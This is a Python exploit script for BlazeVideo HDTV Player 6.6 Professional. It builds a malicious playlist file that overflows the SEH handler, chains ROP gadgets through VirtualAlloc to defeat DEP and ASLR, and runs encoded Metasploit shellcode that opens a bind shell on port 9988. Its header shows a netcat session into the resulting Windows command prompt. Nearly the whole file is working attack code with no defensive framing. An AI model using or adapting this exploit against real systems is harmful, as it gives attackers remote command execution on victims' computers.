#!/usr/bin/python -w #-----------------------------------------------------------------------------------# # Exploit: BlazeVideo HDTV Player 6.6 Professional SEH&DEP&ASLR # # Author: b33f - http://www.fuzzysecurity.com/ # # OS: Tested on Windows 7 32-bit PRO SP1 # # Software Link: http://www.blazevideo.com/download.htm # # Pro v6.6 - Apr 12, 2011 # #-----------------------------------------------------------------------------------# # The opportunity to secure ourselves against defeat lies in our own hands # # but the opportunity of defeating the enemy is provided by the enemy himself. # # - Sun Tzu # #-----------------------------------------------------------------------------------# # Special thanks: # # Lincoln - Thx for the assist! # # corelanc0d3r - Thx for taking the time to go over my work and pointing me # # at VirtualAlloc()! # #-----------------------------------------------------------------------------------# # root@bt:~# nc -nv 192.168.111.129 9988 # # (UNKNOWN) [192.168.111.129] 9988 (?) open # # Microsoft Windows [Version 6.1.7601] # # Copyright (c) 2009 Microsoft Corporation. All rights reserved. # # # # C:\Program Files\BlazeVideo\BlazeVideo HDTV Player 6.6 Professional> # #-----------------------------------------------------------------------------------# filename="blaze.plf" #-----------------------------Pivot-Align-----------------------------# SEH = "\x95\x53\x30\x61" # Pivot; ADD ESP,800 # RETN pad = "b33f"*35 # pad ESP to our alignment (140-bytes) #------------------Save Stack Pointer in EDI&EAX&ESI------------------# stack = ( "\xC5\x30\x03\x64" # PUSH ESP # MOV EAX,EDI # POP EDI # POP ESI # RETN "\x41\x41\x41\x41" # Padding for POP ESI "\x24\x60\x02\x64" # PUSH ESP # POP ESI # RETN "\xEE\x65\x03\x64" # XCHG EAX,ESI # RETN "\x24\x60\x02\x64" # PUSH ESP # POP ESI # RETN "\xBF\xCD\x02\x64") # ADD ESP,20 # RETN #----------------------------VirtualAlloc()---------------------------# params = ( "\xB4\x11\x34\x60" # VirtualAlloc() "WWWW" # lpAddress \ We need this value twice for alignment! "WWWW" # lpAddress / "XXXX" # dwSize (0x1) "YYYY" # flAllocationType (0x1000) "ZZZZ" # flProtect (0x40) "\x41\x41\x41\x41" # Padding "\x41\x41\x41\x41") # Padding #-----------------------ROP Chain - lpAddress-------------------------# rop = ( "\xF7\x24\x03\x64" # ADD EAX,20 # RETN \ "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | ADD EAX 1E0 "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN | "\xF7\x24\x03\x64" # ADD EAX,20 # RETN / "\xCB\x06\x11\x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN \ "\xCB\x06\x11\x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | "\xCB\x06\x11\x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | DEC ESI 8 "\xCB\x06\x11\x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | We need lpAddress twice to return to the proper "\xCB\x06\x11\x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | place after executing VirtualAlloc(), the lpAddress "\xCB\x06\x11\x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | parameters are located at ESI+10 and ESI+14 "\xCB\x06\x11\x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN | "\xCB\x06\x11\x64" # DEC ESI # AND BYTE PTR DS:[EDI-18],DL # RETN / "\xCA\xB5\x33\x60" # MOV DWORD PTR DS:[ESI+10],EAX # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN "\x41\x41\x41\x41" # Padding for POP ESI "\x41\x41\x41\x41" # Padding for POP EBX #------------------------ROP Chain - dwSize---------------------------# "\xD3\xB1\x04\x64" # PUSH EAX # POP ESI # RETN 04 "\xCA\x71\x04\x64" # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04 "\x41\x41\x41\x41" # Padding for RETN 04 "\x6D\xA1\x03\x64" # INC EAX # RETN "\x41\x41\x41\x41" # Padding for RETN 04 "\x15\x14\x03\x64" # INC ESI # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x90\x73\x64\x61" # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN "\x41\x41\x41\x41" # Padding for POP ESI "\x41\x41\x41\x41" # Padding for POP EBX #-------------------ROP Chain - flAllocationType----------------------# "\xD3\xB1\x04\x64" # PUSH EAX # POP ESI # RETN 04 "\xCA\x71\x04\x64" # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04 "\x41\x41\x41\x41" # Padding for RETN 04 "\x13\x30\x10\x64" # POP EAX # RETN "\x41\x41\x41\x41" # Padding for RETN 04 "\xFF\xEF\xFF\xFF" # 0xFFFFEFFF "\xCB\x6E\x33\x61" # NEG EAX # RETN "\x2C\x4E\x10\x64" # DEC EAX # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x90\x73\x64\x61" # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN "\x41\x41\x41\x41" # Padding for POP ESI "\x41\x41\x41\x41" # Padding for POP EBX #-----------------------ROP Chain - flProtect-------------------------# "\xD3\xB1\x04\x64" # PUSH EAX # POP ESI # RETN 04 "\xCA\x71\x04\x64" # XCHG EAX,EDI # ADD EAX,2EB0000 # XOR EAX,EAX # RETN 04 "\x41\x41\x41\x41" # Padding for RETN 04 "\xF7\x24\x03\x64" # ADD EAX,20 # RETN "\x41\x41\x41\x41" # Padding for RETN 04 "\xF7\x24\x03\x64" # ADD EAX,20 # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x15\x14\x03\x64" # INC ESI # RETN "\x90\x73\x64\x61" # MOV DWORD PTR DS:[ESI+14],EAX # MOV EAX,ESI # POP ESI # POP EBX # RETN "\x41\x41\x41\x41" # Padding for POP ESI "\x41\x41\x41\x41" # Padding for POP EBX #-----------------ROP Chain - Fix PTR VirtualAlloc()------------------# "\xD3\xB1\x04\x64" # PUSH EAX # POP ESI # RETN 04 "\x0B\xA8\x03\x64" # MOV EAX,DWORD PTR DS:[EAX] # RETN "\x41\x41\x41\x41" # Padding for RETN 04 "\x0B\xA8\x03\x64" # MOV EAX,DWORD PTR DS:[EAX] # RETN "\x64\x40\x04\x64" # MOV DWORD PTR DS:[ESI],EAX # POP ESI # RETN "\x41\x41\x41\x41" # Padding for POP ESI "\x16\xA4\x04\x64" # MOV EAX,EDI # POP EDI # POP ESI # RETN "\x41\x41\x41\x41" # Padding for POP EDI "\x41\x41\x41\x41" # Padding for POP ESI "\x6D\xA1\x03\x64" # INC EAX # RETN "\x6D\xA1\x03\x64" # INC EAX # RETN "\x6D\xA1\x03\x64" # INC EAX # RETN "\x6D\xA1\x03\x64" # INC EAX # RETN "\xC6\x2A\x03\x64") # PUSH EAX # POP ESP # RETN #-------------------------------------------------------------------------------------# # We have an ample amount of space... # # msfpayload windows/shell_bind_tcp LPORT=9988 R| msfencode -e x86/alpha_mixed -t c # # [*] x86/alpha_mixed succeeded with size 743 (iteration=1) # #-------------------------------------------------------------------------------------# shellcode = ( "\x89\xe5\xda\xd8\xd9\x75\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x4a\x4a" "\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43\x43\x37\x52\x59\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x39" "\x6c\x79\x78\x6b\x39\x63\x30\x57\x70\x55\x50\x31\x70\x6b\x39" "\x39\x75\x30\x31\x78\x52\x45\x34\x6e\x6b\x70\x52\x36\x50\x6e" "\x6b\x32\x72\x34\x4c\x4c\x4b\x50\x52\x77\x64\x4c\x4b\x50\x72" "\x74\x68\x54\x4f\x68\x37\x31\x5a\x51\x36\x65\x61\x6b\x4f\x74" "\x71\x59\x50\x6e\x4c\x75\x6c\x75\x31\x53\x4c\x63\x32\x54\x6c" "\x31\x30\x4f\x31\x38\x4f\x44\x4d\x56\x61\x78\x47\x6b\x52\x78" "\x70\x76\x32\x73\x67\x4e\x6b\x43\x62\x52\x30\x4e\x6b\x70\x42" "\x37\x4c\x43\x31\x4a\x70\x4e\x6b\x67\x30\x42\x58\x6d\x55\x6f" "\x30\x31\x64\x62\x6a\x37\x71\x7a\x70\x62\x70\x4e\x6b\x42\x68" "\x72\x38\x6e\x6b\x32\x78\x75\x70\x67\x71\x4b\x63\x6d\x33\x45" "\x6c\x73\x79\x4c\x4b\x57\x44\x6e\x6b\x43\x31\x5a\x76\x66\x51" "\x4b\x4f\x65\x61\x79\x50\x6e\x4c\x6f\x31\x38\x4f\x44\x4d\x36" "\x61\x48\x47\x47\x48\x6d\x30\x53\x45\x6c\x34\x56\x63\x51\x6d" "\x58\x78\x55\x6b\x63\x4d\x55\x74\x61\x65\x6a\x42\x36\x38\x4c" "\x4b\x36\x38\x77\x54\x36\x61\x38\x53\x31\x76\x4e\x6b\x34\x4c" "\x72\x6b\x4c\x4b\x53\x68\x67\x6c\x77\x71\x39\x43\x4e\x6b\x66" "\x64\x4c\x4b\x43\x31\x48\x50\x4c\x49\x53\x74\x35\x74\x35\x74" "\x43\x6b\x33\x6b\x30\x61\x73\x69\x71\x4a\x62\x71\x49\x6f\x6d" "\x30\x50\x58\x31\x4f\x61\x4a\x4e\x6b\x42\x32\x38\x6b\x6d\x56" "\x43\x6d\x33\x58\x75\x63\x74\x72\x57\x70\x35\x50\x50\x68\x42" "\x57\x51\x63\x70\x32\x43\x6f\x73\x64\x33\x58\x32\x6c\x51\x67" "\x56\x46\x76\x67\x6b\x4f\x4b\x65\x6f\x48\x6c\x50\x63\x31\x63" "\x30\x73\x30\x37\x59\x78\x44\x72\x74\x32\x70\x55\x38\x64\x69" "\x6d\x50\x50\x6b\x43\x30\x69\x6f\x4e\x35\x72\x70\x72\x70\x56" "\x30\x42\x70\x63\x70\x50\x50\x61\x50\x62\x70\x30\x68\x79\x7a" "\x76\x6f\x4b\x6f\x6d\x30\x59\x6f\x79\x45\x4e\x69\x79\x57\x44" "\x71\x39\x4b\x56\x33\x65\x38\x76\x62\x35\x50\x57\x57\x76\x64" "\x6d\x59\x6b\x56\x51\x7a\x62\x30\x33\x66\x56\x37\x65\x38\x59" "\x52\x49\x4b\x77\x47\x55\x37\x59\x6f\x59\x45\x46\x33\x51\x47" "\x45\x38\x6c\x77\x39\x79\x65\x68\x39\x6f\x59\x6f\x6b\x65\x46" "\x33\x56\x33\x73\x67\x72\x48\x74\x34\x7a\x4c\x37\x4b\x59\x71" "\x6b\x4f\x68\x55\x61\x47\x6f\x79\x78\x47\x43\x58\x50\x75\x62" "\x4e\x70\x4d\x53\x51\x49\x6f\x7a\x75\x35\x38\x32\x43\x30\x6d" "\x42\x44\x75\x50\x6c\x49\x48\x63\x72\x77\x46\x37\x33\x67\x56" "\x51\x69\x66\x42\x4a\x57\x62\x50\x59\x70\x56\x59\x72\x69\x6d" "\x43\x56\x4b\x77\x77\x34\x75\x74\x77\x4c\x77\x71\x56\x61\x4c" "\x4d\x37\x34\x31\x34\x44\x50\x58\x46\x37\x70\x51\x54\x31\x44" "\x52\x70\x42\x76\x46\x36\x51\x46\x67\x36\x43\x66\x50\x4e\x43" "\x66\x42\x76\x43\x63\x71\x46\x45\x38\x53\x49\x48\x4c\x37\x4f" "\x4b\x36\x59\x6f\x58\x55\x4b\x39\x6b\x50\x62\x6e\x56\x36\x61" "\x56\x4b\x4f\x30\x30\x31\x78\x77\x78\x4e\x67\x47\x6d\x33\x50" "\x49\x6f\x6b\x65\x4d\x6b\x48\x70\x6d\x65\x4e\x42\x32\x76\x65" "\x38\x59\x36\x4f\x65\x6f\x4d\x4d\x4d\x49\x6f\x78\x55\x47\x4c" "\x33\x36\x71\x6c\x57\x7a\x4b\x30\x39\x6b\x6b\x50\x53\x45\x64" "\x45\x4f\x4b\x53\x77\x75\x43\x44\x32\x50\x6f\x32\x4a\x43\x30" "\x50\x53\x49\x6f\x48\x55\x41\x41") ph33r = "\x90"*160 + shellcode b00m = SEH + pad + stack + params + rop + ph33r buffer = "A"*872 + b00m + "B"*(4128-len(b00m)) textfile = open(filename , 'w') textfile.write(buffer) textfile.close()